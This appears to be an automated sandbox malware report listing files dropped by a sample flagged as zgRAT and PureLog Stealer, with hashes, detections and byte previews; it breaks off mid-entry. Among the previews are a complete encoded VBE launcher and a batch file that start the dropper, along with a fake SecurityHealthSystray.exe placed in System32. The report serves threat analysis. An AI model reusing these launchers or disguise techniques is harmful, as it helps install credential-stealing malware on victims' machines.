                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                C:\Users\user\Desktop\KSdeeKAW.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                C:\Users\user\Desktop\LsbmIiGn.log

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                                C:\Users\user\Desktop\atZTrSKs.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\mEBzyVHW.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\qeNySdhc.log

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\sgzhoMlY.log

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                C:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:MSVC .res
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1224
                                                                                                                                Entropy (8bit):4.435108676655666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                Malicious:false
                                                                                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                                C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4608
                                                                                                                                Entropy (8bit):3.9147451735926455
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:6ApLPt2M7Jt8Bs3FJsdcV4MKe27xvqBHuOulajfqXSfbNtm:rPVPc+Vx9MxvkIcjRzNt
                                                                                                                                MD5:ED73DFEC33807770310F9DB4FE5DE568
                                                                                                                                SHA1:89A3F1E302752A232075CD51517E88F89B91D559
                                                                                                                                SHA-256:506FEE8CB6CB7ED4BCB144010453844ED347CB7DA4619A5B6BBAF0BE25CFB8A0
                                                                                                                                SHA-512:29958C4678E8C3EB65DF84B4754764530EC437BA2928AE130C047424EA1C0E2825091777649457CD6BD257E7ABEEDE7C25289C8096C5EF52F3EAFE5D2FF15D61
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                                C:\Windows\apppatch\8e809f57164876

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (681), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):681
                                                                                                                                Entropy (8bit):5.892072987222378
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:1eJtaMrkIh5vUHsKzUhpF/lnKbAkvqtBKEhE4NIw9+APh/rDNrhL8YY7DPlVM:10IMDMMKAT5F0StBvh9xPXhf6Plm
                                                                                                                                MD5:5453B5D619A5DA1FDE52552B89458BFC
                                                                                                                                SHA1:6616214BD9C91CBEB35C7C5DB71A895C71E53360
                                                                                                                                SHA-256:B10F23B7C7988371FA56093EF1A4409AF9A3599145F2BBDDC1A430FA85F2284C
                                                                                                                                SHA-512:ED2C532F21870739A178D562920D4AC3FA20AC16DFAD98CE09BF39AEEACF30D6D032C6859D8CACBC1EF41FF9DDB23472094375B9F2F5C34A78E680BFCE7CC04E
                                                                                                                                Malicious:false
                                                                                                                                Preview:eZoFvDgFHCKczKnlITqOgWFMZjKdAPkeK6w2qIzToeNr8LHhfY9jdxJIUbqM3DF1cqS2Yv59eWjBIYONcm7lQAAXwniOcnalZVOR3OJuc9FHNH95MctQFdkcq4FuMqg168mxJ6TOdNIR53JpomC93Jg5vwl9IYhwcNKPfMwPJfx2UThxuaFkoh7xcqBXVUFEpWyrs4Jc0w0XWnlcPyOsS7H5QXxzKZ4zasN7fzE0Rnu2rjayEjHhFXvsP2bVHTRb1A7nan6ZtYapMOOq68ulRWtC6esmYts7VTAqmxYbmsxr6GfAouYJjqJeR4q55UAApdU3NhEIkT8jjBG09r8nUjYoJfZrHcgSrwBdwlxGqQjPsk5Pyz6OVXqGFpurIWBHxq1wAnEX416E9I6ikJ3RfS6UG4XG1F7UObcBsIPKvjTeamG6sLH9dtmfthqFP7fz3mzip40c3sg58c4dxbXq780ey7SKbK5xEekxwhRyVoFvNqgQnNRykz15wUurmpAtxt1d2GqPJjUS2ERIaBhO3GNPnoBcxjLpoW8ezDYhgBoAeiCrDmQkIwzqgmzNFOckXoofGxTXm9s2cMuFmTZLSkh1hR8MNKbRjEnz3hkQS28IE7OT2ulvzQRwHx8yyGKbiaSXi4MEsI2ZmZxjDoUcjqbSx0sFiwbMsgkno0v7i

                                                                                                                                C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):102
                                                                                                                                Entropy (8bit):5.148668694887557
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:jdSzzGWJvojIiDIWp4AyRNVMRbGsEcAtP1n:hiojD1wVQh+t9n
                                                                                                                                MD5:3577D367F55C11CA80F5C81DC9C28EF7
                                                                                                                                SHA1:EA6C1B88F826CC8BAD3B8641A34BEFC2F2767C03
                                                                                                                                SHA-256:24CA8EC54CE27306835A5FE5BFBD0C2931D10ABA593A8A8AD671C2A9C5225275
                                                                                                                                SHA-512:72AA0A5867B26FF5530F7E964A406A9DA12C2BFDCF60C2161E969F581107B1A46103D04167276D69158AB1AE0975DF22FB1E71E3E82A455F5EC9E75889002608
                                                                                                                                Malicious:false
                                                                                                                                Preview:%cxviAQtMKVhlIdY%%oudjvPH%..%bnG%"C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"%HCMKyUCruJSOx%

                                                                                                                                C:\bridgemssurrogateintonet\8e809f57164876

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (411), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):411
                                                                                                                                Entropy (8bit):5.859243709087893
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:ATPK1eC9QoW+owszyV6p4R2d0p6mDIUbS:AKN9qKHW4RRX2
                                                                                                                                MD5:89902E9996BA978C8D4617366CF48ECA
                                                                                                                                SHA1:38EB0CA0B342ED4DABB2DEF9DBDBEE3CE5E85CCE
                                                                                                                                SHA-256:EA2D9D8560B51D1DC513F882ED29CE9D166A0BE2F5AC29FBE746E53997D962E7
                                                                                                                                SHA-512:F7C51D6B821BFF16A558A25C1C32190F7CA566809094391407DC0211891F552FCAFF3B54D4F98D76ED7C3610995A730436D4A44E22987FFE8D0A245BB6922E07
                                                                                                                                Malicious:false
                                                                                                                                Preview:uKvr229AksMGg6rqrGyK4N3X4Cnv55qAFJBRaAnsooPCucAF9rJD3zehQYxzONEoCMAX5aPqcGfQ70mbChwOwmGQodACNydaklAicmKibdkxUOjZwWwrb02ZFusbaNdomFqW0D9ZXNwSBT6a4kQ1Bw8tskdr4sINA6KOiNjsWWTODjXvyRhz7mn0G6oPkRfpEiSFJr2rBheoduqINr3mKSQXSUHliTHE1nJeQRmGZ0yZH9WWQfC2Y2fwS4xyjQIraZwzkL25FwNTe1QT7vVDROq8IXMVexhJsH9rMhvEmGxlpMRbod1y4EZLsyrN9gbRPDkX1iHa9QbLbFT6FurA6sOory8XzhFGofVll4jFWaznnOtnfuIOybVhz6pDjtkbLUg5trVKLlof3kBcEV2FZ0SNKyw

                                                                                                                                C:\bridgemssurrogateintonet\QHbd8WvF.vbe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):215
                                                                                                                                Entropy (8bit):5.735529192912125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:GigwqK+NkLzWbHmrFnBaORbM5nCccnkd4Rds:GoMCzWLmhBaORbQCFkd4Hs
                                                                                                                                MD5:CCBE3C4CFE1A134DB74A5A9C0EC0A573
                                                                                                                                SHA1:4F2846FF85B05FEF53EC2BA7F750ECF97E1DC5A5
                                                                                                                                SHA-256:D9063FA3649E48CF51433373373E3FA5481C1A0443700052742FAE4C27073A39
                                                                                                                                SHA-512:B096B860CD655FFA3B5B97523509DBC9FDE99CBE3CA8609DA4B62D7C4164A0C8417CA4115C32D11D32DF04C1EC9D303C7744A5E4482CB45A95CC2F9BA4CF31E7
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:#@~^vgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v q!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8Mk9o+s/k;DMWLlD+rUDWx.OzJGYd"OrqAFZnH 8mYE~,T~,0Csk+HD0AAA==^#~@.

                                                                                                                                C:\bridgemssurrogateintonet\a7fb11a7dc10a6

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256
                                                                                                                                Entropy (8bit):5.7559552411681665
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:JlddVWH29+c13jQ/5BfcnxwrbetHI0Fvc9wPl9n:3ddkH29+EU/5q++tHF5Wwrn
                                                                                                                                MD5:AA2FB4EF5AF448CBABF4B902470C9218
                                                                                                                                SHA1:5C0FF4ABBBE1994DED478BDF6B04DB844308F996
                                                                                                                                SHA-256:FA85E1510043BF194B0CC8F7F2BD6768B6140F986CA4822E208A31AE3114F723
                                                                                                                                SHA-512:1F03EE2D14B60D24CAABA6DBDE21D61F1A710D28DD88CB3EBFB4D4BCC19F3874412617305A0035ABECC6E44780202ECE8155D7E9B9A0D5418321EB70C5A42C9E
                                                                                                                                Malicious:false
                                                                                                                                Preview:GcvoaV6GnBPT9qoRmrr6FJXxKxTz2isrA9x1DfgQ9qXappdPVgKVqYJ6F8enCHNFTiT92xNGLa7Yw6HeTDdWXWAmz1vFB2O2dSHHWdWiSEKQbuKI09T9o0r6hqKBBIESMF5dz9H0r4DTMuLFqnOBjONmlLkqTVhK92DWzrT12dRtxXtxfEUX3Cs71S2nZbgVX2UUqzP8UXJF7dyNbwKOAJR6JGegzpbb66W5DZGqyWDf3mAXdoMmQSUOlXKkUtJo

                                                                                                                                C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....og.................*..........nI... ...`....@.. ....................................@................................. I..K....`.. ............................................................................ ............... ..H............text...t)... ...*.................. ..`.rsrc... ....`.......,..............@....reloc...............0..............@..B................PI......H.......l...8................s...H.......................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~....{y...9....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{}...:....& ....8y......0.......... ........8........E........F.......R...f.......8........~....(K...~....(O... ....?*... ....~....{....:....& ....8....r...ps....z*~....9.... ....8}......... ....~....{....9c...& ....8X...~....(C... .... .... ....s....~....(G.

                                                                                                                                C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
